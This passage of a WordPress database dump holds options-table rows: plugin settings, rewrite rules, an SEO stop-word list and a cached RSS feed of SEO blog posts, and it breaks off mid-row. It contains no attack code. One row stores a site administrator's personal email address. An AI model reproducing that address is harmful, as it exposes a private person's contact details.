(561, 'easy_table_plugin_option', 'a:20:{s:12:\"shortcodetag\";s:5:\"table\";s:7:\"attrtag\";s:4:\"attr\";s:11:\"tablewidget\";s:0:\"\";s:12:\"scriptloadin\";a:7:{i:0;s:0:\"\";i:1;s:9:\"is_single\";i:2;s:0:\"\";i:3;s:7:\"is_page\";i:4;s:0:\"\";i:5;s:0:\"\";i:6;s:0:\"\";}s:14:\"scriptinfooter\";s:0:\"\";s:11:\"tablesorter\";s:0:\"\";s:2:\"th\";s:0:\"\";s:7:\"loadcss\";s:1:\"1\";s:5:\"class\";s:0:\"\";s:5:\"width\";s:4:\"100%\";s:6:\"border\";s:1:\"0\";s:5:\"theme\";s:8:\"cuscosky\";s:5:\"limit\";s:1:\"0\";s:4:\"trim\";s:0:\"\";s:2:\"nl\";s:2:\"~~\";s:10:\"terminator\";s:2:\"\\n\";s:9:\"delimiter\";s:1:\",\";s:9:\"enclosure\";s:6:\"&quot;\";s:6:\"escape\";s:1:\"\\\";s:7:\"csvfile\";s:0:\"\";}', 'yes'),
(779, 'seo_ultimate_module_meta', 'a:6:{s:32:\"home_description_tagline_default\";b:1;s:25:\"description_posttype_post\";s:9:\"{excerpt}\";s:25:\"description_posttype_page\";s:0:\"\";s:29:\"description_taxonomy_category\";s:13:\"{description}\";s:29:\"description_taxonomy_post_tag\";s:13:\"{description}\";s:17:\"description_paged\";s:31:\"{meta_description} - Page {num}\";}', 'yes'),
(621, 'wpcf7', 'a:1:{s:7:\"version\";s:5:\"3.5.3\";}', 'yes'),
(623, '_transient_random_seed', 'da0679e1e9fdeb4951576fb930eb4d22', 'yes'),
(3161, 'rewrite_rules', 'a:90:{s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:62:\"collaborateur-service/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:60:\"index.php?collaborateur_service=$matches[1]&feed=$matches[2]\";s:57:\"collaborateur-service/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:60:\"index.php?collaborateur_service=$matches[1]&feed=$matches[2]\";s:50:\"collaborateur-service/([^/]+)/page/?([0-9]{1,})/?$\";s:61:\"index.php?collaborateur_service=$matches[1]&paged=$matches[2]\";s:32:\"collaborateur-service/([^/]+)/?$\";s:43:\"index.php?collaborateur_service=$matches[1]\";s:63:\"collaborateur-worksite/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:61:\"index.php?collaborateur_worksite=$matches[1]&feed=$matches[2]\";s:58:\"collaborateur-worksite/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:61:\"index.php?collaborateur_worksite=$matches[1]&feed=$matches[2]\";s:51:\"collaborateur-worksite/([^/]+)/page/?([0-9]{1,})/?$\";s:62:\"index.php?collaborateur_worksite=$matches[1]&paged=$matches[2]\";s:33:\"collaborateur-worksite/([^/]+)/?$\";s:44:\"index.php?collaborateur_worksite=$matches[1]\";s:41:\"collaborateur/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:51:\"collaborateur/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:71:\"collaborateur/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:66:\"collaborateur/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:66:\"collaborateur/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:34:\"collaborateur/([^/]+)/trackback/?$\";s:40:\"index.php?collaborateur=$matches[1]&tb=1\";s:42:\"collaborateur/([^/]+)/page/?([0-9]{1,})/?$\";s:53:\"index.php?collaborateur=$matches[1]&paged=$matches[2]\";s:49:\"collaborateur/([^/]+)/comment-page-([0-9]{1,})/?$\";s:53:\"index.php?collaborateur=$matches[1]&cpage=$matches[2]\";s:34:\"collaborateur/([^/]+)(/[0-9]+)?/?$\";s:52:\"index.php?collaborateur=$matches[1]&page=$matches[2]\";s:30:\"collaborateur/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:40:\"collaborateur/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:60:\"collaborateur/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:55:\"collaborateur/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:55:\"collaborateur/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:20:\"(.?.+?)(/[0-9]+)?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:20:\"([^/]+)(/[0-9]+)?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";}', 'yes'),
(631, 'category_children', 'a:0:{}', 'yes'),
(784, 'seo_ultimate_module_slugs', 'a:1:{s:15:\"words_to_remove\";s:4221:\"a\nable\nabout\nabove\nabroad\naccording\naccordingly\nacross\nactually\nadj\nafter\nafterwards\nagain\nagainst\nago\nahead\nain\'t\nall\nallow\nallows\nalmost\nalone\nalong\nalongside\nalready\nalso\nalthough\nalways\nam\namid\namidst\namong\namongst\nan\nand\nanother\nany\nanybody\nanyhow\nanyone\nanything\nanyway\nanyways\nanywhere\napart\nappear\nappreciate\nappropriate\nare\naren\'t\naround\nas\na\'s\naside\nask\nasking\nassociated\nat\navailable\naway\nawfully\nb\nback\nbackward\nbackwards\nbe\nbecame\nbecause\nbecome\nbecomes\nbecoming\nbeen\nbefore\nbeforehand\nbegin\nbehind\nbeing\nbelieve\nbelow\nbeside\nbesides\nbest\nbetter\nbetween\nbeyond\nboth\nbrief\nbut\nby\nc\ncame\ncan\ncannot\ncant\ncan\'t\ncaption\ncause\ncauses\ncertain\ncertainly\nchanges\nclearly\nc\'mon\nco\nco.\ncom\ncome\ncomes\nconcerning\nconsequently\nconsider\nconsidering\ncontain\ncontaining\ncontains\ncorresponding\ncould\ncouldn\'t\ncourse\nc\'s\ncurrently\nd\ndare\ndaren\'t\ndefinitely\ndescribed\ndespite\ndid\ndidn\'t\ndifferent\ndirectly\ndo\ndoes\ndoesn\'t\ndoing\ndone\ndon\'t\ndown\ndownwards\nduring\ne\neach\nedu\neg\neight\neighty\neither\nelse\nelsewhere\nend\nending\nenough\nentirely\nespecially\net\netc\neven\never\nevermore\nevery\neverybody\neveryone\neverything\neverywhere\nex\nexactly\nexample\nexcept\nf\nfairly\nfar\nfarther\nfew\nfewer\nfifth\nfirst\nfive\nfollowed\nfollowing\nfollows\nfor\nforever\nformer\nformerly\nforth\nforward\nfound\nfour\nfrom\nfurther\nfurthermore\ng\nget\ngets\ngetting\ngiven\ngives\ngo\ngoes\ngoing\ngone\ngot\ngotten\ngreetings\nh\nhad\nhadn\'t\nhalf\nhappens\nhardly\nhas\nhasn\'t\nhave\nhaven\'t\nhaving\nhe\nhe\'d\nhe\'ll\nhello\nhelp\nhence\nher\nhere\nhereafter\nhereby\nherein\nhere\'s\nhereupon\nhers\nherself\nhe\'s\nhi\nhim\nhimself\nhis\nhither\nhopefully\nhow\nhowbeit\nhowever\nhundred\ni\ni\'d\nie\nif\nignored\ni\'ll\ni\'m\nimmediate\nin\ninasmuch\ninc\ninc.\nindeed\nindicate\nindicated\nindicates\ninner\ninside\ninsofar\ninstead\ninto\ninward\nis\nisn\'t\nit\nit\'d\nit\'ll\nits\nit\'s\nitself\ni\'ve\nj\njust\nk\nkeep\nkeeps\nkept\nknow\nknown\nknows\nl\nlast\nlately\nlater\nlatter\nlatterly\nleast\nless\nlest\nlet\nlet\'s\nlike\nliked\nlikely\nlikewise\nlittle\nlook\nlooking\nlooks\nlow\nlower\nltd\nm\nmade\nmainly\nmake\nmakes\nmany\nmay\nmaybe\nmayn\'t\nme\nmean\nmeantime\nmeanwhile\nmerely\nmight\nmightn\'t\nmine\nminus\nmiss\nmore\nmoreover\nmost\nmostly\nmr\nmrs\nmuch\nmust\nmustn\'t\nmy\nmyself\nn\nname\nnamely\nnd\nnear\nnearly\nnecessary\nneed\nneedn\'t\nneeds\nneither\nnever\nneverf\nneverless\nnevertheless\nnew\nnext\nnine\nninety\nno\nnobody\nnon\nnone\nnonetheless\nnoone\nno-one\nnor\nnormally\nnot\nnothing\nnotwithstanding\nnovel\nnow\nnowhere\no\nobviously\nof\noff\noften\noh\nok\nokay\nold\non\nonce\none\nones\none\'s\nonly\nonto\nopposite\nor\nother\nothers\notherwise\nought\noughtn\'t\nour\nours\nourselves\nout\noutside\nover\noverall\nown\np\nparticular\nparticularly\npast\nper\nperhaps\nplaced\nplease\nplus\npossible\npresumably\nprobably\nprovided\nprovides\nq\nque\nquite\nqv\nr\nrather\nrd\nre\nreally\nreasonably\nrecent\nrecently\nregarding\nregardless\nregards\nrelatively\nrespectively\nright\nround\ns\nsaid\nsame\nsaw\nsay\nsaying\nsays\nsecond\nsecondly\nsee\nseeing\nseem\nseemed\nseeming\nseems\nseen\nself\nselves\nsensible\nsent\nserious\nseriously\nseven\nseveral\nshall\nshan\'t\nshe\nshe\'d\nshe\'ll\nshe\'s\nshould\nshouldn\'t\nsince\nsix\nso\nsome\nsomebody\nsomeday\nsomehow\nsomeone\nsomething\nsometime\nsometimes\nsomewhat\nsomewhere\nsoon\nsorry\nspecified\nspecify\nspecifying\nstill\nsub\nsuch\nsup\nsure\nt\ntake\ntaken\ntaking\ntell\ntends\nth\nthan\nthank\nthanks\nthanx\nthat\nthat\'ll\nthats\nthat\'s\nthat\'ve\nthe\ntheir\ntheirs\nthem\nthemselves\nthen\nthence\nthere\nthereafter\nthereby\nthere\'d\ntherefore\ntherein\nthere\'ll\nthere\'re\ntheres\nthere\'s\nthereupon\nthere\'ve\nthese\nthey\nthey\'d\nthey\'ll\nthey\'re\nthey\'ve\nthing\nthings\nthink\nthird\nthirty\nthis\nthorough\nthoroughly\nthose\nthough\nthree\nthrough\nthroughout\nthru\nthus\ntill\nto\ntogether\ntoo\ntook\ntoward\ntowards\ntried\ntries\ntruly\ntry\ntrying\nt\'s\ntwice\ntwo\nu\nun\nunder\nunderneath\nundoing\nunfortunately\nunless\nunlike\nunlikely\nuntil\nunto\nup\nupon\nupwards\nus\nuse\nused\nuseful\nuses\nusing\nusually\nv\nvalue\nvarious\nversus\nvery\nvia\nviz\nvs\nw\nwant\nwants\nwas\nwasn\'t\nway\nwe\nwe\'d\nwelcome\nwell\nwe\'ll\nwent\nwere\nwe\'re\nweren\'t\nwe\'ve\nwhat\nwhatever\nwhat\'ll\nwhat\'s\nwhat\'ve\nwhen\nwhence\nwhenever\nwhere\nwhereafter\nwhereas\nwhereby\nwherein\nwhere\'s\nwhereupon\nwherever\nwhether\nwhich\nwhichever\nwhile\nwhilst\nwhither\nwho\nwho\'d\nwhoever\nwhole\nwho\'ll\nwhom\nwhomever\nwho\'s\nwhose\nwhy\nwill\nwilling\nwish\nwith\nwithin\nwithout\nwonder\nwon\'t\nwould\nwouldn\'t\nx\ny\nyes\nyet\nyou\nyou\'d\nyou\'ll\nyour\nyou\'re\nyours\nyourself\nyourselves\nyou\'ve\nz\nzero\";}', 'yes'),
(785, 'seo_ultimate_module_titles', 'a:14:{s:10:\"title_home\";s:6:\"{blog}\";s:12:\"title_single\";s:15:\"{post} | {blog}\";s:10:\"title_page\";s:15:\"{page} | {blog}\";s:14:\"title_category\";s:19:\"{category} | {blog}\";s:9:\"title_tag\";s:14:\"{tag} | {blog}\";s:9:\"title_day\";s:43:\"Archives for {month} {day}, {year} | {blog}\";s:11:\"title_month\";s:36:\"Archives for {month} {year} | {blog}\";s:10:\"title_year\";s:28:\"Archives for {year} | {blog}\";s:12:\"title_author\";s:26:\"Posts by {author} | {blog}\";s:12:\"title_search\";s:35:\"Search Results for {query} | {blog}\";s:9:\"title_404\";s:22:\"404 Not Found | {blog}\";s:11:\"title_paged\";s:20:\"{title} - Page {num}\";s:13:\"terms_ucwords\";b:1;s:14:\"rewrite_method\";s:2:\"ob\";}', 'yes'),
(786, 'seo_ultimate_module_sds-blog', 'a:2:{s:8:\"lastread\";i:1374769524;s:14:\"rss_item_times\";a:30:{i:0;i:1375386086;i:1;i:1374867048;i:2;i:1373572135;i:3;i:1363000014;i:4;i:1362469261;i:5;i:1361639568;i:6;i:1361592039;i:7;i:1361339166;i:8;i:1358497827;i:9;i:1357287192;i:10;i:1357126983;i:11;i:1351371266;i:12;i:1350566293;i:13;i:1349963180;i:14;i:1343119337;i:15;i:1333816617;i:16;i:1329778931;i:17;i:1329369690;i:18;i:1327102022;i:19;i:1326227772;i:20;i:1325374654;i:21;i:1324300000;i:22;i:1322526225;i:23;i:1322413239;i:24;i:1321455897;i:25;i:1320671449;i:26;i:1320396188;i:27;i:1320217605;i:28;i:1320062142;i:29;i:1319723462;}}', 'yes'),
(3035, 'auto_core_update_notified', 'a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:19:\"dpierrard@gmail.com\";s:7:\"version\";s:5:\"3.7.1\";s:9:\"timestamp\";i:1383161970;}', 'yes'),
(3322, '_transient_timeout_rss_da8c757f762dcd1ec67339593414ea85', '1383586827', 'no');
INSERT INTO `www_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(3323, '_transient_rss_da8c757f762dcd1ec67339593414ea85', 'O:9:\"MagpieRSS\":19:{s:6:\"parser\";i:0;s:12:\"current_item\";a:0:{}s:5:\"items\";a:30:{i:0;a:12:{s:5:\"title\";s:37:\"Internal Link Structures Still Matter\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/LJ6Gvt04QPQ/\";s:8:\"category\";s:3:\"SEO\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Thu, 01 Aug 2013 12:41:26 PDT\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9278\";s:7:\"content\";a:1:{s:7:\"encoded\";s:1746:\"<p>When it comes to SEO and search engines, the <a href=\"http://www.seodesignsolutions.com/blog/mini-blogs/seo-its-all-about-the-cache/\">cache</a> is king. One of the most simple metrics of measuring the wealth and authority of a web property is <strong>how many pages are indexed </strong>and whether or not preferred landing pages are established.<strong><br />\n</strong></p>\n<div class=\"wp-caption aligncenter\" style=\"width: 410px\"><a href=\"http://www.seodesignsolutions.com/blog/seo-tips/seo-tips-for-link-structure/\"><img title=\"SEO-Cache\" alt=\"\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2010/01/links-in-to-links-out.jpg\" width=\"400\" height=\"300\" /></a><p class=\"wp-caption-text\">Structuring Your Link Hierarchy</p></div>\n<p>However, before visitors can arrive, search engines need to find, spider, index and rank your pages for relevance. This means you should take every opportunity to increase indexation through creating viable link structures based on a hierarchy of importance for keywords or landing pages.</p>\n<p>Click The Image Above or Follow the Link to Read the Complete Post &gt;&gt;&gt;<a href=\"http://www.seodesignsolutions.com/blog/seo-tips/seo-tips-for-link-structure/\">SEO Tips for Link Structure</a>&lt;&lt;&lt;!</p>\n<p><span id=\"more-9278\"></span></p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=LJ6Gvt04QPQ:OoemnRzMDjw:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/LJ6Gvt04QPQ\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:322:\"When it comes to SEO and search engines, the cache is king. One of the most simple metrics of measuring the wealth and authority of a web property is how many pages are indexed and whether or not preferred landing pages are established. However, before visitors can arrive, search engines need to find, spider, index [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"1\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:75:\"http://www.seodesignsolutions.com/blog/seo/internal-link-structures-matter/\";}s:7:\"summary\";s:322:\"When it comes to SEO and search engines, the cache is king. One of the most simple metrics of measuring the wealth and authority of a web property is how many pages are indexed and whether or not preferred landing pages are established. However, before visitors can arrive, search engines need to find, spider, index [...]\";s:12:\"atom_content\";s:1746:\"<p>When it comes to SEO and search engines, the <a href=\"http://www.seodesignsolutions.com/blog/mini-blogs/seo-its-all-about-the-cache/\">cache</a> is king. One of the most simple metrics of measuring the wealth and authority of a web property is <strong>how many pages are indexed </strong>and whether or not preferred landing pages are established.<strong><br />\n</strong></p>\n<div class=\"wp-caption aligncenter\" style=\"width: 410px\"><a href=\"http://www.seodesignsolutions.com/blog/seo-tips/seo-tips-for-link-structure/\"><img title=\"SEO-Cache\" alt=\"\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2010/01/links-in-to-links-out.jpg\" width=\"400\" height=\"300\" /></a><p class=\"wp-caption-text\">Structuring Your Link Hierarchy</p></div>\n<p>However, before visitors can arrive, search engines need to find, spider, index and rank your pages for relevance. This means you should take every opportunity to increase indexation through creating viable link structures based on a hierarchy of importance for keywords or landing pages.</p>\n<p>Click The Image Above or Follow the Link to Read the Complete Post &gt;&gt;&gt;<a href=\"http://www.seodesignsolutions.com/blog/seo-tips/seo-tips-for-link-structure/\">SEO Tips for Link Structure</a>&lt;&lt;&lt;!</p>\n<p><span id=\"more-9278\"></span></p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=LJ6Gvt04QPQ:OoemnRzMDjw:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/LJ6Gvt04QPQ\" height=\"1\" width=\"1\"/>\";}i:1;a:12:{s:5:\"title\";s:29:\"Why Website Authority Matters\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/BjdrkiImg_8/\";s:8:\"category\";s:10:\"Mini-Blogs\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Fri, 26 Jul 2013 12:30:48 PDT\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9274\";s:7:\"content\";a:1:{s:7:\"encoded\";s:2150:\"<p>Rome was not built in a day, neither was a top ranking using SEO. Each keyword has a threshold that search engines and the competition have set, finding it and surpassing that mark is the true objective of search engine optimization.<br />\n<a href=\"http://www.seodesignsolutions.com/blog/seo-marketing/build-authority-before-links/\"><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/01/mount-everest.jpg\" alt=\"mount-everest\" title=\"mount-everest\" width=\"400\" height=\"265\" class=\"aligncenter size-full wp-image-1106\" /></a><br />\nJust like climbing <strong>Mount Everest</strong> (<strong>conquering a competitive keyword</strong>), takes planning, preparation and execution. One of the common misconceptions about search engine optimization is that once you acquire the most competitive keyword in your industry the floodgates will open and your job marketing your product or service is done.</p>\n<p>Nothing is farther from the truth, sure SEO can generate hordes of traffic, but unless the fundamental <a href=\"http://www.seodesignsolutions.com/blog/seo/impulse-surfing-click-triggers-and-keywords/\">click-triggers</a> are in place, a strong value proposition exists or if your presentation just doesn&#8217;t make the grade, there is no loyalty from would be visitors perusing your content, only the back button.</p>\n<p>The premise is simple, appear for as many relevant keywords as possible that funnel visitors to the underlying conversion objective. </p>\n<p>>>>Click Here to Read the Full Post &#8211; <a href=\"http://www.seodesignsolutions.com/blog/seo-marketing/build-authority-before-links/\">Build Authority Before Links</a> < <<.<br />\n<span id=\"more-9274\"></span></p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=BjdrkiImg_8:bQt6OrubZgg:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/BjdrkiImg_8\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:351:\"Rome was not built in a day, neither was a top ranking using SEO. Each keyword has a threshold that search engines and the competition have set, finding it and surpassing that mark is the true objective of search engine optimization. Just like climbing Mount Everest (conquering a competitive keyword), takes planning, preparation and execution. [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"2\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:76:\"http://www.seodesignsolutions.com/blog/mini-blogs/website-authority-matters/\";}s:7:\"summary\";s:351:\"Rome was not built in a day, neither was a top 